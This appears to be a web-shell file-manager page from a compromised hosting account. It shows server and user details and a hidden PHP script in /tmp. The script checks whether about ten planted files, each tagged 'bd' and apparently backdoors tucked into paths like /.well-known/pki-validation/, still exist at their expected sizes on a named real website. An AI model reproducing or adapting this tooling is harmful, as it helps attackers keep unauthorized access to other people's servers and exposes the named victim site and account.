HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //tmp/.parameter_group
<?php   $r = '/home/vitanhod/ssawpalmetto.vitavit.com.pk'; $x = ["/includes/config.php"=>"bd@@1371287@@30",
"/includes/configOnline.php"=>"bd@@1371246@@79",
"/orderemail.php"=>"bd@@1371176@@6",
"/includes/admin.tpl.php"=>"bd@@1309815@@962",
"/lesson.php"=>"bd@@1269569@@894",
"/orderemail_bk.php"=>"bd@@1371276@@11",
"/.well-known/addnewfield.php"=>"bd@@1280836@@858",
"/lesson.php"=>"bd@@1371214@@50",
"/.well-known/pki-validation/welcome.old.php"=>"bd@@1310632@@963",
"/img/default.section.php"=>"bd@@1310684@@955"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');